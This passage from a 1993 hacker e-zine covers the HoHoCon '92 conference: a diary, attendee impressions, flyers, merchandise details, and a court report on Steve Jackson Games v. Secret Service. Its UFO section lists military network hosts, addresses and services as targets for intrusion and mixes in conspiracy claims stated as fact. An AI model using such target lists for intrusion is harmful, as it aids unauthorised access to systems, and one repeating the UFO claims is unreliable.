- the room. Ponder what's sleeping in the chair briefly.
-
- Saturday ??? Try to figure out if you're awake or dead. Take a collection
- from those that are still alive. Run to some micro-compact
- Japanese convenience store hidden in the middle of suburbia
- hell and obtain sugar-coated nutrients with Windrunner and
- JunkMaster and Gaijin.
-
- Saturday 1pm Arrive for the conference. Get mega-amounts of raffle tickets.
-
- Saturday 2pm Conference actually gets started a few hours behind schedule.
- Tape conversations from the man with the whisper 2000 home
- version. Ponder the light orbiting Erik B's head.
-
- Saturday 4pm Witness Steve Ryan in action against the hotel staff.
- Wonder where the young hack in the corner got the gallon,
- mostly empty now, of wine. Ponder if he's going to spew.
-
- Saturday 6pm Try to figure out what everyone is going to do with the
- several hundred flashing construction lights given out.
- Calculated the ratio of men to women as 15,000:1, roughly.
-
- Saturday 8pm Try to keep awake while wondering how much torture can be
- sustained. Watch Count Zero nodding off. Hitman and I
- pulled out our decoder rings to interpret Crunch's hidden
- message.
-
- Saturday 10pm Dominoes Pizza makes it to the room. OUR SAVIOR !!! He's
- 5-minutes late. Custody battle over the pizza ensues. The
- manager is called, at which point he lowers the $50 price
- for the two pizzas down to $30. We scrape a few dollars and
- hand the peon delivery boy some cheap beer.
-
- Saturday Nite Hand out copies of "cindy's torment" to the code kids.
- Watch Erik B.'s continuation of necrophiliac desires on
- the acquired VCR that mysteriously appeared. Avoided the
- hotel security by changing room while monitoring their
- frequencies (thanks RDT). Obtained evidence that hackers
- were breaking into VR R&D departments to engage in endless
- routines of VR sex for Cyborgasmic responses. Saw Crunch's
- host's room blow out as the multitudes of computers fry the
- circuits. Followed the 'sheep' about the hotel.
-
- Sunday ??? Woke bright and early to a car locked with the keys inside.
- Fortunately, 50-odd slim-jims appeared out of nowhere to
- save the day. Windrunner chauffeured us back to our lair.
-
- Sunday 3pm Hacked into the Louisiana Lotto machine from an acoustical
- modem and laptop from a pay phone to rig the numbers and
- then bought a ticket.
-
- Sunday 7pm Returned to hell. Lost the lotto ticket in the growing
- pile of sugar-coated necessities sheddings. Cursed.
-
- Sunday 8pm Turned the PC on and hit the networks.
-
-
- --------------------------
-
- Jim Carter, president of Bank Security in Houston, TX, wrote the
- following impressions of HoHoCon for Security Insider Report
- (December, 1992)
-
- HoHoCon was in fact "Unphamiliar Territory" for this "good ole boy,"
- but it didn't take long till I was into the swing of things and
- telling lies of how we cheat and steal to get our information. Of
- course, everyone who talked to this "good ole boy" thought he was with
- one of the three letter agencies. As the stories rolled on about what
- they (the hackers) could do, such as produce virii that would cause
- video display terminals and hard drives to smoke, I had to sit back, sip
- my brewski and say "wow." We sat back, enjoyed a few more rounds, told
- a few more lies and had a good time.
-
- Well, this old boy didn't show until about noon on Saturday. Of course
- the conference hadn't started yet so we didn't miss anything. The
- program was kicked off with a number of questions about who, what, where
- and how. It was difficult to determine how many people were there since
- the room was packed like a can of sardines. Our estimate was over two
- hundred, not counting the hackers still in their rooms. Was this
- another drunken free for all, as in the past? A report was given on
- cellular hacking and toll fraud. Hackers' rights were presented by an
- attorney. Also discussed was the stupidity of the press and law
- enforcement.
-
- Some others talked about suppressed information from the federal
- government concerning UFO's and how hackers are gaining this info. And
- of course the White House wants to know their sources.
-
- Hand outs were given including virii and virus source code. I did
- decline any virii, but who knew what I would get before this was over.
- I believe this was the most responsive and gratifying group I have
- spoken to this year. I also expect to get more business because of this
- presentation than any other this year.
-
- A lengthy door prize was held in which I was the winner of more virii.
- Again, I did decline, but passed the winning ticket on. Captain Crunch
- was the final speaker. In conclusion, the attendees were the good, the
- bad and the ugly. We did find HoHoCon very informative and, yes, we
- will attend again. In closing, I hope each and everyone had a very
- "Merry HoHoCon."
-
-
- --------------------------
-
- A (Hacker's) Mind is a Terrible Mind to Waste
- Unix World, page 136, March 1993
-
- by Gary Andrew Poole
-
- [Unix World wanted MONEY to reprint this in full...Yeah, right.
- Someone already posted it on alt.cyberpunk some time ago
- if you can't find it anywhere.]
-
- *-----------------------------------*
-
- Various Stuff Picked up at HoHoCon
-
- *-----------------------------------*
-
- --------------------------
- Flyer:
- --------------------------
-
- Unphamiliar Territory
- Phalcon/Skism Western World Headquarters
- The Ghost in The Machine Distribution
-
- Featuring:
-
- - 'Neutral Territory' forum where security issues can be discussed with
- top security people in the field.
-
- - Completely LEGAL forums on computer security, hacking, phraud.
-
- - Thousands of textfiles covering all aspects of the underground.
-
- - Hundreds of viruses and virus source code for the serious
- programmer.
-
- Information:
-
- - Administrators are Invalid Media, Mercury/NSA, Warlock Bones and
- Jaeger.
-
- - Run on a professor Falken/LOD donated ZOOM v32bis
-
- - Mentioned in MONDO 2000 and reviewed in the latest Infoworld.
-
- - Dialin 602-894-1757 / 24 hours
-
- --------------------------
- Flyer
- --------------------------
-
- In your defense..... Courtesy Freeside Orbital Data Network, HoHoCon '92
- - B. O'Blivion
- Repeat after me:
-
- "If I am reading this to you, then I believe that you are
- questioning, detaining, or arresting me, or searching my person or
- possessions in the course of your official duties."
-
- "I do not consent to any search of seizure of any part of my person
- or property, nor to any property of others under my control. I do not
- consent to any person's examination, search, or removal of any
- information storage equipment or media in my possession. You are hereby
- notified that such information storage equipment or media contain
- private written and electronic mail, confidential communications, and
- other material protected under the Electronic Communications Privacy Act
- and other statutes."
-
- "I respectfully decline to answer any questions beyond confirmation
- of my identity, and require access to legal counsel immediately. I
- demand that access to legal counsel be provided to me before any
- questioning takes place. I will answer no questions nor give any
- information outside the presence of legal counsel. All requests for
- interviews, statements, consents, or information of any sort should be
- addressed to me through my attorney. I invoke the rights five to me by
- the Fifth and Sixth Amendments of the Constitution of the United
- States."
-
- "I further notify you that the speech and information contained on
- information storage and handling devices at this site are protected
- by the First and Fourth Amendments to the Constitution of the United
- States, and that any unlawful search or seizure of these items or of
- the information they contain will be treated as a violation of the
- Constitutional rights of myself and other users of these devices and
- media."
-
- "I further notify you that any such violations of any person's legal
- or Constitutional rights which are committed at any time, by any person,
- will be the subject of civil legal action for all applicable damages
- sustained. I require that at this time all officers participating in
- this illegal search, seizure, or arrest identify themselves at this time
- by name and badge number to me and my legal counsel."
-
- [Include if applicable]
-
- "I further notify you that I am a Computer System Operator providing
- private electronic mail, electronic publications, and personal
- information storage services to users in this State, and among the
- United States. Any person causing a breach of the security of, or
- violation of the privacy of, the information and software herein will be
- held liable for all civil damages suffered by any and all users
- thereof."
-
- --------------------------
- Flyer
- --------------------------
-
- HoHoCon 1992
- Amusing Local Frequencies
- courtesy of -=RDT.
-
- Allen Park Inn Security - 464.500 Houston Post - 154.540
- 173.275
-
- 452.975
- Houston Police:
-
- North Shepherd Patrol - 460.325
- NE Patrol - 460.125
- SE Patrol - 460.025
- SW Patrol - 460.050
- Central Patrol - 460.100
- Spec. Op. Traffic - 460.350
- Car 2 Car - 460.225
- South Central Patrol - 460.550
- NW Patrol - 460.475
- West Patrol - 460.150
- Accident - 460.375
- Misc - 460.525
- 460.575
- 460.400
- Records - 460.425
- City Marshalls - 453.900
- Paging - 155.670
- Police Intercity - 453-550
-
- A number of people have been asking "who is RDT? what the hell is
- RDT?" For the record, we're hackers who believe information should be
- free. All information. The world is full of phunky electronic gadgets
- and networks, and we want to share our information with the hacker
- community. We currently write for 2600 magazine, Phrack, Mondo 2000,
- Cybertek, and Informatik.
- The five "charter members" of RDT are Count Zero, Brian Oblivion,
- Magic Man, White Knight, and Omega. Each of us has complementary
- skills, and as a group we have a very wide area of technical
- knowledge. Feel free to contact us.
-
- Count Zero - count0@ganglia.mgh.harvard.edu
- Brian Oblivion - oblivion@ganglia.mgh.harvard.edu
- Magic Man - magic@ganglia.mgh.harvard.edu
- White Knight - wknight@ganglia.mgh.harvard.edu
- Omega - omega@spica.bu.edu
-
- "They are satisfying their appetite to know something that is not theirs
- to know." - Asst. District Attorney Don Ingraham
-
- "All-you-can eat buffet...for FREE!" - Restricted Data Transmissions
-
- RDT "Truth is Cheap, but Information Costs."
-
- --------------------------
- Magazine
- --------------------------
-
- Future Sex
-
- (a very odd pseudo-cyberpunk skin mag)
-
- 4 issues for $18, Canada $26, International US $48
-
- 1095 Market Street
- Suite 809
- San Francisco, CA 94103
- 415-621-5496
- 415-621-4946 fax
-
- --------------------------
- Video
- --------------------------
-
- Red $19.95
- (Phone Pranks can kill)
-
- Nekromantik II $29.95
- (No comment)
-
- Available through
-
- Film Threat Video
- P.O. Box 3170
- Los Angeles, CA
- 90078-3170 USA
-
- 818-848-8971
-
- Shipping: 1 tape $3.40
- 2-3 $4.60
- 4-6 $5.80
- 6+ $7.00
-
- Visa/MC accepted.
-
- --------------------------
- Official HoHoCon Crud
- --------------------------
-
-
- HoHoCon '92
-
- Product Ordering Information
-
-
- If you are interested in obtaining either HoHoCon shirts or videos,
- please contact us at any of the following:
-
- drunkfux@cypher.com
- hohocon@cypher.com
- cDc@cypher.com
- dfx@nuchat.sccsi.com
- drunkfux@ganglia.mgh.harvard.edu
- 359@7354 (WWIV Net)
-
- Freeside Orbital Data Network
- ATTN: dFx/HoHoCon
- 11504 Hughes Road Suite #124
- Houston, Texas
- 77089
-
- 713-866-4884 (Voice Mail)
-
-
- The shirts are $15 plus $2 shipping ($2.50 for two shirts). At this
- time, they only come in extra large. We may add additional sizes if
- there is a demand for them. The front of the shirt has the following
- in a white strip across the chest:
-
-
- I LOVE FEDS
-
- (Where LOVE = a red heart, very similar to the I LOVE NY logo)
-
-
- And this on the back:
-
- dFx & cDc Present
-
- HOHOCON '92
-
- December 18-20
- Allen Park Inn
- Houston, Texas
-
-
- There is another version of the shirt available with the following:
-
- I LOVE WAREZ
-
- The video includes footage from all three days, is six hours long and
- costs $18 plus $2 shipping ($2.50 if purchasing another item also).
- Please note that if you are purchasing multiple items, you only need
- to pay one shipping charge of $2.50, not a charge for each item. If
- you wish to send an order in now, make all checks or money orders
- payable to O.I.S., include your phone number and mail it to the street
- address listed above. Allow ten working days for arrival.
-
- Thanks to everyone who attended and supported HoHoCon '92. Mail us if
- you wish to be an early addition to the HoHoCon '93 (December 17-19)
- mailing list.
-
- --------------------------
- Text File
- --------------------------
-
- Rumors have begun to surface about a group of hackers who were involved in a
- project to uncover information regarding the existence of UFOs. The
- most public example pertaining to this alleged project was seen on
- Dateline NBC on the screen of the mystery hacker "Quentin."
-
- The story goes that this group of individuals decided to put their
- skills to work on a project that, if successful, would add legitimacy to
- the hacking process by uncovering information on what has been called the
- greatest cover-up in the history of the world. Milnet TAC ID cards
- were obtained through military officials sympathetic to the cause. Several
- sites and networks were targeted that had in the past been linked to UFO
- activity. These were sites like the Jet Propulsion Laboratory, Sandia Labs,
- TRW Space Research, American Institute of Physics, and various other
- educational, government and military sites.
-
- The rumors also emphasize that several sites had what these individuals
- called "particularly heavy security." Within several seconds after
- connection had been established, system administrators of sites used in
- this project were contacted. Further rumors state that there was
- information regarding a propulsion system designed utilizing what is
- termed "corona discharge" being analyzed at one site. The most sinister
- of all rumors states that one particular participant who was allegedly
- deeply immersed in TRWs internal network has not been heard from since
- uncovering data regarding a saucer being housed at one of their Southern
- California installations.
-
- Believe what you will about the reality of this project. Much will be
- dismissed as hacker lore, but within the core of every rumor lies a
- grain of truth.
-
- Are we being lied to? Why is this information still classified by the NSA?
- What are they hiding from us behind a maze of security? Will we continue
- to stand idly by and let an uncaring and deliberately evasive government
- shield us from what may be the most important, and potential dangerous
- news to ever surface? Information wants to be free, and only a
- concerted group effort can make this happen. How much do you really
- want to know about what is really going on?
-
- What follows is information that has been released regarding this project...
-
- ---------------------------------------------------------------------------
-
- PROJECT ALF-1
-
- A Planetary Effort
-
- TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET
- TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET
-
- These are the raw data. Where comments are appropriate, they
- will be included. The data will be grouped together with dates,
- names etc. to make correlations easier.
-
- There are countless references to the aliens, their down space
- craft and what the Government is doing with them.
- If, as is supposed, the research on the craft and the 'ufonauts'
- continues today, then undoubtedly there are computer records, somewhere.
-
- I. Searching the Skies; Tripping the Electronic Fence around the
- USA.
-
- US Space Command Space Surveillance Center, Cheyenne Mountain,
- Colorado Springs, Box Nine (Electronic Surveillance Room)
- (This is where they search for and track UFO activity.)
- U.S. Naval Space Surveillance System, Dahlgreen, Virginia, (Main
- computer), Lake Kickapoo, Texas (listening post): Search for
- 'Flash Traffic'
- Commander Sheila Mondran
- CINC-NORAD
- Space Detection and Tracking System
- Malabar, Forida
- 'Teal Amber' search
- National Military Command Center - Pentagon
- (These are the areas where UFO activity is tracked.
- There is a radar shield around the country that is 'tripped' by UFO's.
- All tracking and F14 scrambling is done through this system.)
-
- II. The Second Cover Up
-
- Defense Intelligence Agency
- Directorate for Management and Operations
- Project Aquarius (in conjunction with SRI)
-
- Colonel Harold E. Phillips, Army (where/what Feb. 1987)
- UFO Working Group, (formed Dec 1987)
- Major General James Pfautz, USAF, Ret. (March 87)
- US Army experiments -(Monroe Institute, Faber, VA)
- Major General Albert Stubblebine
- Capt. Guy Kirkwood,
- (thousands of feet of film of UFO's catalogued and on record somewhere.)
- The UFO Working Group was formed because one arm of the Govt doesn't
- know what the other is doing.)
-
- III. National Security
-
- NSA NAtional Security Agency, Dundee Society (Super secret elite
- who have worked on UFO's.)
- NSA - Research and Engineering Division
- NSA - Intercept Equipment Division
-
- Kirtland Force Base, Office of Special Investigations, Project
- Beta. 1979-83-? (Sandia Labs are here.)
- Paul Bennewitz
- Project Blue
- Project Blue Book
-
- (NSA computers do analysis for Pentagon.)
-
- IV. More Secret Players
-
- NASA, Fort Irwin, Barstow, CA
- NASA Ames Research Center, Moffet Field Naval Base
- SETI
- State Dept. Office of Advanced Technology
- Any Astronauts from Mercury, Gemini and Apollo
- CIA - Office of Scientific Investigation
- CIA - Domestic Collection Division
-
- (NASA has known about UFO's since the astronauts saw and photoed them.
- Records somewhere.)
-
- V. Dealing with the Secret
-
- MJ-12 (1952)
- Majectic 12
- Operation Majestic 12
- MAJIC-12
- Admiral Roscoe H. Hillenkoetter
- Dr. Vannevar Bush
- Dr. Detlev Bronk
- Dr. Jerome Hunsaker
- Dr. Donald Menzel
- Dr. Lloyd Berkner
- General Robt. Montague
- Sidney Souers
- Gordon Gray
- General Hoyt Vandenberg
- Sect State James Forrestal
- General Nathan Twining
- Pres. Truman
- Pres. Eisenhower
-
- (One of the biggest secrets ever.)
-
- Nevada Desert, Area 51, S4 (houses UFO's)
- (Robert Lazar talked!) 9 space ships on storage. Propulsion by
- corona discharge.
-
- (Area 51 is the most protected base on the planet.)
-
- VI. ROSWELL, NM Crashes
- Mac Brazel (farmer)
- Major Jesse A. Marcel
- 509th. Bomber Group
- Lewis Rickett, CIC Officer
- Colonel William Blanchard
- Gerald Anderson, witness to crash and aliens
-
- Wright Patterson Air Force Base, (parts lists of UFO's catalogued;
- autopsies on record) (Bodies in underground facility)
- Foreign Technology Building
- USAAF (United States Army Air Force reports: "Early Automation"
- Muroc, CA (Base with UFO's for study)
-
- (1 saucer with 4 aliens. They were transported to Wright and then
- saved, catalogued and autopsied.)
-
-
- VII. THOSE ON GOVT SHIT LIST
-
- (People who have gotten close.)
-
- Robert Lazar
- Major Donald Keyhoe
- William Moore
- Stanton Friedman
- Jaime Shandera
- Whitley Streiber
- Timothy Goode, UK
-
- Other UFO Crashes
- Del Rio, TX 12/50, Colonel Robert Willingham
- Las Vegas, 4/18/62
- Kecksburg, PA 12/9/65
-
-
- VIII. International
-
- Belgian Air Force. (They are going public and have records.
- Press conference held 7/12/91.)
- Australian Air Force
- UK; GCHQ
- British Air Force
- Belgium:
- NATO Radar Stations
-
-
- IX. UFO Civilian Groups. (What do they really know?)
-
- NICAP, National Investigations Committee on Aerial Phenomena
- (private company.)
-
- APRO, Tucson, AZ (Aerial Phenomona Research Organization,
- private company.)
-
- MUFON Mutual UFO Network
-
- X. GENERAL
-
- Kenneth Arnold, June 24, 1947
- Cattle and Sheep Mutilations
- General and Pres. Eisenhower, (private files and library)
- President Truman
- Wright Field or Wright Patterson Air Force Base, Dayton, OH, (Air
- Force Foriegn Technology Division)
- USAF Project Saint
- USAF Project Gemini
- Project Moon Dust
- Project Sign
- Project Grudge
- General Hoyt Vandenberg (1940-1960)
- Air Force Regulation 200-2 (8/12/54)
- Holloman AFB, NM
- Roswell, NM July 7, 1947
-
-
- XI. Possible Searches
-
- Presidential Libraries
- Old USAAF, (United States Army Air Force)
- NASA
- Astronaut Frank Borman, Gemini 7, pictures of UFO
- Neil Armstrong, Apollo 11, saw UFO's on moon.
- Colonel Gordon Cooper saw a bunch of them
- James McDivitt, 6/66
- United Nations
- NATO;
- General Lionel Max Chassin, French Air Force
- Star Wars, United Kingdom, 23 scientists killed in 6 years.
- Gulf Breeze, FL
- Additional UFO records at NSA, CIA, DIA, FBI
-
-
- Good Searching.
-
- ----------------------------------------------------------------------
- Project
- ->Green Cheese<-
- Data Base
- ---------------------------------------------------------------------
- Holloman AFB
- Location: New Mexico. Preconceived landing 15 years ago.
-
- DDN Locations:
- --------------
-
- NET : 132.5.0.0 : HOLLOMAN :
-
- GATEWAY : 26.9.0.74, 132.5.0.1 : HOLLOMAN-GW.AF.MIL : CISCO-MGS :: EGP,IP/GW :
- GATEWAY : 26.9.0.74, 132.5.0.1 : HOLLOMAN-GW.AF.MIL : CISCO-MGS :: EGP,IP/GW :
-
- HOST : 26.10.0.74 : HOLLOMAN-TG.AF.MIL : VAX-8650 : VMS : TCP/FTP,TCP/TELNET,TCP
- SMTP :
-
- HOST : 26.6.0.74 : HOLLOMAN-AM1.AF.MIL : WANG-VS100 : VSOS : TCP/TELNET,TCP/FTP,
- TCP/SMTP :
-
- Host: DDNVAX2.6585TG.AF.MIL
- 156.6.1.2
-
- -----------------------------------------------------------------------
-
- Kirtland Air Force Base
- Office Of Special Investigations. Sandia Labs are here. Also part of
- NSA Intercept Equipment Division.
-
- Key Words/names:
- ----------------
- Sandia Labs
- Project Beta (1979-83-?)
- Paul Bennewitz
- Project Blue
- Project Blue Book
-
- DDN Locations:
- --------------
-
- NET : 131.23.0.0 : KIRTLAND-NET :
- NET : 132.62.0.0 : KIRTLAND2 :
- GATEWAY : 26.17.0.48, 131.23.0.1 : KIRTLAND2-GW.AF.MIL,KIRTLAND-GW.AF.MIL
- : CISCO-MGS : UNIX : IP/GW,EGP :
- GATEWAY : 26.18.0.87, 132.62.0.1
- : KIRTLAND1-GW.AF.MIL,KIRTLAND1606ABW-GW.AF.MIL : CISCO-MGS :
- : EGP,IP/GW :
- HOST : 26.0.0.48 : KIRTLAND.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
- HOST : 26.0.0.87 : KIRTLAND2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
- HOST : 26.6.0.87 : KIRTLAND-AM1.AF.MIL : WANG-VS300 : VS ::
-
- -----------------------------------------------------------------------
-
- NASA
- What can I say about NASA that you couldnt guess for yourself....
- (Except that the following sights are SPECIFIC NASA sights, not
- just randomly suspected sights).
-
- DDN locations:
- --------------
-
- Fort Irwin, Barstow, CA:
- -----------------------
- NET : 134.66.0.0 : IRWIN :
- NET : 144.146.0.0 : FTIRWIN1 :
- NET : 144.147.0.0 : FTIRWIN2 :
- GATEWAY : 26.24.0.85, 26.7.0.230, 144.146.0.1, 144.147.0.0
- : FTIRWIN-GW1.ARMY.MIL : CISCO-GATEWAY : CISCO : IP/GW,EGP :
- HOST : 26.14.0.39 : IRWIN-ASBN.ARMY.MIL : NCR-COMTEN-3650 : COS2 ::
- HOST : 26.13.0.85 : FTIRWIN-AMEDD.ARMY.MIL : ATT-3B2-600G : UNIX
- : TCP/FTP,TCP/SMTP,TCP/TELNET :
- HOST : 26.14.0.85 : FTIRWIN-IGNET.ARMY.MIL : DATAPOINT-8605 : RMS ::
- HOST : 26.15.0.85 : IRWIN-EMH1.ARMY.MIL,FTIRWIN-EMH1.ARMY.MIL : SPERRY-5000
- : UNIX : TCP/FTP,TCP/SMTP,TCP/TELNET :
-
- Moffet Field Naval Base (Ames Research Center):
- -----------------------------------------------
- GATEWAY : 26.20.0.16, 192.52.195.1 : MOFFETT-FLD-MB.DDN.MIL,AMES-MB.DDN.MIL
- : C/70 : CHRYSALIS : IP/GW,EGP :
- HOST : 26.0.0.16 : MOFFETT.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
-
- -----------------------------------------------------------------------
- Pentagon (National Military Command Center)
- One of many places in charge of tracking UFO activity.
-
- Possible DDN sights:
- -------------------
-
- GATEWAY : 26.9.0.26, 134.205.123.140 : PENTAGON-GW.HQ.AF.MIL : CISCO-AGS :
- : EGP,IP/GW :
- GATEWAY : 26.25.0.26, 131.8.0.1 : PENTAGON-GW.AF.MIL,HQUSAFNET-GW.AF.MIL
- : CISCO-MGS :: IP/GW,EGP :
- GATEWAY : 26.10.0.76, 192.31.75.235 : PENTAGON-BCN-GW.ARMY.MIL : SUN-360
- : UNIX : IP/GW,EGP :
- GATEWAY : 26.26.0.247, 192.31.75.1 : PENTAGON-GW.ARMY.MIL : SUN-3/160
- : UNIX : EGP,IP/GW :
- GATEWAY : 26.31.0.247, 26.16.0.26, 141.116.0.1 : PENTAGON-GW1.ARMY.MIL
- : CISCO : CISCO : IP/GW,EGP :
- HOST : 26.0.0.26 : PENTAGON.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
- HOST : 26.24.0.26 : OPSNET-PENTAGON.AF.MIL : VAX-8500 : VMS
- : TCP/TELNET,TCP/FTP,TCP/SMTP :
- HOST : 26.10.0.76, 192.31.75.235 : PENTAGON-BCN.ARMY.MIL : SUN-360 : UNIX
- : TCP/FTP,TCP/SMTP,TCP/TELNET :
- HOST : 26.0.0.247 : PENTAGON2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
- HOST : 26.7.0.247 : PENTAGON-AMSNET.ARMY.MIL : AMDAHL : MVS
- : TCP/TELNET,TCP/FTP :
- HOST : 26.14.0.247 : NSSC-PENTAGON.NAVY.MIL : ALTOS-3068A : UNIX
- : TCP/FTP,TCP/TELNET,TCP/SMTP :
- HOST : 26.18.0.247 : PENTAGON-EMH4.ARMY.MIL : SPERRY-5000/80 : UNIX
- : TCP/TELNET,TCP/FTP,TCP/SMTP :
- HOST : 26.26.0.247, 192.31.75.1 : PENTAGON-AI.ARMY.MIL : SUN-3/160 : UNIX
- : TCP/TELNET,TCP/FTP,TCP/SMTP,TCP/FINGER :
-
- -----------------------------------------------------------------------
-
- Raddaman
- Location of infamous building 18a. Suspected saucers and others?
-
- DDN location, yet unknown.
-
- ------------------------------------------------------------------------
-
- SECI
- ?
-
- DDN Locations:
- --------------
-
- NET : 192.108.216.0 : ARC-SETI-NET :
-
- ------------------------------------------------------------------------
-
- Utah Locations:
-
- GATEWAY : 26.18.0.20, 131.27.0.1 : HILL-GW.AF.MIL,HILLAFBNET-GW.AF.MIL
- : CISCO-MGS :: IP/GW,EGP :
-
- GATEWAY : 26.18.0.20, 131.27.0.1 : HILL-GW.AF.MIL,HILLAFBNET-GW.AF.MIL
- : CISCO-MGS :: IP/GW,EGP :
-
- HOST : 26.5.0.20 : HILL.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
- HOST : 26.0.0.99 : HILL2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
- HOST : 26.12.0.99 : HILL-AM1.AF.MIL : WANG-VS100 : VS
- : TCP/TELNET,TCP/FTP,TCP/SMTP :
-
- -------------------------------------------------------------------------
-
- Wright Patterson AFB
- Catalogued UFO parts list. Autopsies on record. Bodies located in
- underground facility of Foreign Technology Building.
-
- DDN Locations:
- --------------
-
- HOST : 26.0.0.47 : WRIGHTPAT.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
- HOST : 26.8.0.123 : WRIGHTPAT2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
- HOST : 26.0.0.124 : WRIGHTPAT3.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
- HOST : 26.3.0.170 : WAINWRIGHT-IGNET.ARMY.MIL : CONVERGENT-TECH-CN-100
- : CTOS ::
- HOST : 26.0.0.176 : WRIGHTPAT4.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
-
- -------------------------------------------------------------------------
-
- Nevada:
-
- NET : 131.216.0.0 : NEVADA :
-
- -------------------------------------------------------------------------
-
- Random Suspected Nets:
-
- WIN:
- Top Secret Network. All coordinator's have last name Win.
-
- NET : 141.8.0.0 : DFN-WIN8 : NET : 141.9.0.0 : DFN-WIN9 :
- NET : 141.10.0.0 : DFN-WIN10 : NET : 141.15.0.0 : DFN-WIN15 :
- NET : 141.25.0.0 : DFN-WIN25 : NET : 141.26.0.0 : DFN-WIN26 :
- NET : 141.28.0.0 : DFN-WIN28 : NET : 141.57.0.0 : DFN-WIN57 :
- NET : 141.58.0.0 : DFN-WIN58 : NET : 141.59.0.0 : DFN-WIN59 :
- NET : 141.60.0.0 : DFN-WIN60 : NET : 141.61.0.0 : DFN-WIN61 :
- NET : 141.62.0.0 : DFN-WIN62 : NET : 141.63.0.0 : DFN-WIN63 :
- NET : 141.64.0.0 : DFN-WIN64 : NET : 141.65.0.0 : DFN-WIN65 :
- NET : 141.66.0.0 : DFN-WIN66 : NET : 141.67.0.0 : DFN-WIN67 :
- NET : 141.68.0.0 : DFN-WIN68 : NET : 141.69.0.0 : DFN-WIN69 :
- NET : 141.70.0.0 : DFN-WIN70 : NET : 141.71.0.0 : DFN-WIN71 :
- NET : 141.72.0.0 : DFN-WIN72 : NET : 141.73.0.0 : DFN-WIN73 :
- NET : 141.74.0.0 : DFN-WIN74 : NET : 141.75.0.0 : DFN-WIN75 :
- NET : 141.76.0.0 : DFN-WIN76 : NET : 141.77.0.0 : DFN-WIN77 :
- NET : 141.78.0.0 : DFN-WIN78 : NET : 141.79.0.0 : DFN-WIN79 :
- NET : 141.80.0.0 : DFN-WIN80 : NET : 141.81.0.0 : DFN-WIN81 :
- NET : 141.82.0.0 : DFN-WIN82 : NET : 141.83.0.0 : DFN-WIN83 :
- NET : 141.84.0.0 : DFN-WIN84 : NET : 141.85.0.0 : DFN-WIN85 :
- NET : 141.86.0.0 : DFN-WIN86 : NET : 141.87.0.0 : DFN-WIN87 :
- NET : 141.88.0.0 : DFN-WIN88 : NET : 141.89.0.0 : DFN-WIN89 :
- NET : 141.90.0.0 : DFN-WIN90 : NET : 141.91.0.0 : DFN-WIN91 :
- NET : 141.92.0.0 : DFN-WIN92 : NET : 141.93.0.0 : DFN-WIN93 :
- NET : 141.94.0.0 : DFN-WIN94 : NET : 141.95.0.0 : DFN-WIN95 :
- NET : 141.96.0.0 : DFN-WIN96 : NET : 141.97.0.0 : DFN-WIN97 :
- NET : 141.98.0.0 : DFN-WIN98 : NET : 141.99.0.0 : DFN-WIN99 :
- NET : 188.1.0.0 : WIN-IP : NET : 192.80.90.0 : WINDATA :
-
- -----------------------------------
-
- Scinet:
- Sensitive Compartmented Information Network
-
- NET : 192.12.188.0 : BU-SCINET :
-
- -----------------------------------
-
- Disnet:
- Defense Integrated Secure Network. Composed of SCINET, WINCS
- ([World Wide Military and Command Control System] Intercomputer
- Network Communication Subsystem), and Secretnet(WIN).
-
- NET : 22.0.0.0 : DISNET :
-
- -----------------------------------
-
-
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 14 of 14
-
- PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
- PWN PWN
- PWN Phrack World News PWN
- PWN PWN
- PWN Compiled by Datastream Cowboy PWN
- PWN PWN
- PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
-
-
- STEVE JACKSON GAMES v. UNITED STATES SECRET SERVICE
-
- Rights To Be Tested In Computer Trial January 20, 1993
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- by Joe Abernathy (The Houston Chronicle)(Page A13)
- *Reprinted With Permission*
-
- Summary Judgment Denied In Case
-
- AUSTIN -- A judge Tuesday denied plaintiff lawyers' request for summary
- judgment in a case brought against the U.S. Secret Service to set the bounds of
- constitutional protections for electronic publishing and electronic mail.
-
- U.S. District Judge Sam Sparks acted after hearing complicated arguments
- regarding application of 1st and 4th Amendment principles in computer-based
- communications and publishing. The case will go to trial at 9 a.m. today.
-
- "Uncontested facts show the government violated the Privacy Protection Act and
- the Electronic Communications Privacy Act," said Pete Kennedy, attorney for
- Steve Jackson Games, an Austin game company that brought the lawsuit.
-
- Mark W. Batten, attorney for the Department of Justice, which is defending the
- Secret Service, declined to comment on the proceedings.
-
- Steve Jackson's company, which publishes fantasy role-playing games -- not
- computer games -- was raided by the Secret Service on March 1, 1990, during a
- nationwide sweep of suspected criminal computer hackers.
-
- Agents seized several computers and related hardware from the company and from
- the Austin home of Steve Jackson employee Loyd Blankenship. Taken from the
- game publisher was an electronic bulletin board used to play-test games before
- they were printed and exchange electronic mail with customers and free-lance
- writers.
-
- Another seized computer contained the text of the company's work in progress,
- GURPS Cyberpunk, which was being prepared for the printers.
-
- Blankenship's purported membership in the Legion of Doom -- a group of computer
- hackers from Austin, Houston and New York -- led the Secret Service to Steve
- Jackson's door.
-
- Neither Jackson nor his company was suspected of wrongdoing.
-
- The game publisher is named in two paragraphs of the 42-paragraph affidavit
- requesting the 1990 search warrant, which targeted Blankenship -- a fact
- Kennedy cited in seeking summary judgment.
-
- Kennedy presented evidence that the original Secret Service affidavit for the
- warrant used to raid Steve Jackson Games contained false statements.
- Supporting documentation showed that Bellcore expert Henry Kluepfel disputes
- statements attributed to him that accounted for the only link between Steve
- Jackson Games and the suspicion Blankenship was engaged in illegal activity.
-
- Batten came away visibly shaken from questioning by Sparks, and later had a
- tense exchange with Kennedy outside the courtroom.
-
- The lawsuit contends the government violated 1st Amendment principles by
